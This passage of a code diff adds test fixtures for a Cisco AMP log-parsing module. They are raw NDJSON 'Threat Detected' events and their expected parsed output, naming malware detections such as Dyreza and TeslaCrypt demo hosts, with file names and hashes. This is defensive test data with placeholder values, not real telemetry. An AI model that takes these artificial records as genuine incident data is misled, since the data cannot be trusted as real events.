Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537365","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258118058508000,"timestamp":1610705633,"timestamp_nanoseconds":636000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258118058508361","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667837389570000,"timestamp":1610705633,"timestamp_nanoseconds":689000000,"date":"2021-01-15T10:13:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667837389570068","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258066518901000,"timestamp":1610705621,"timestamp_nanoseconds":608000000,"date":"2021-01-15T10:13:41+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258066518900808","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258014979293000,"timestamp":1610705609,"timestamp_nanoseconds":581000000,"date":"2021-01-15T10:13:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258014979293255","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257963439686000,"timestamp":1610705597,"timestamp_nanoseconds":569000000,"date":"2021-01-15T10:13:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257963439685702","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":778000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667579691532307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":747000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532306","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667579691532000,"timestamp":1610705573,"timestamp_nanoseconds":371000000,"date":"2021-01-15T10:12:53+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667579691532305","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667575396565000,"timestamp":1610705572,"timestamp_nanoseconds":971000000,"date":"2021-01-15T10:12:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667575396565008","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log-expected.json new file mode 100644 index 00000000000..1722799bd5e --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp3.ndjson.log-expected.json @@ -0,0 +1,2828 @@ +[ + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6159251512150196256", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 381000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "input.type": "log", + "log.offset": 0, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196255", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 381000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 1317, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196254", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 365000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 2642, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196253", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 350000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 3967, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196252", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 334000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 5292, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196251", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 318000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 6617, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196250", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 318000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 7942, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196249", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 303000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 9267, + "related.hash": [ + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "209a288c68207d57e0ce6e60ebf60729", + "e654d39cd13414b5151e8cf0d8f5b166dddd45cb" + ], + "related.hosts": [ + "Demo_TeslaCrypt" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:17:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "90:61:b5:c9:13:79" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6159251512150196248", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "90:61:b5:c9:13:79" + ], + "cisco.amp.timestamp_nanoseconds": 287000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6159251512150196000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "209a288c68207d57e0ce6e60ebf60729", + "file.hash.sha1": "e654d39cd13414b5151e8cf0d8f5b166dddd45cb", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", + "file.name": "rjtsbks.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe", + "fileset.name": "amp", + "host.hostname": "Demo_TeslaCrypt", + 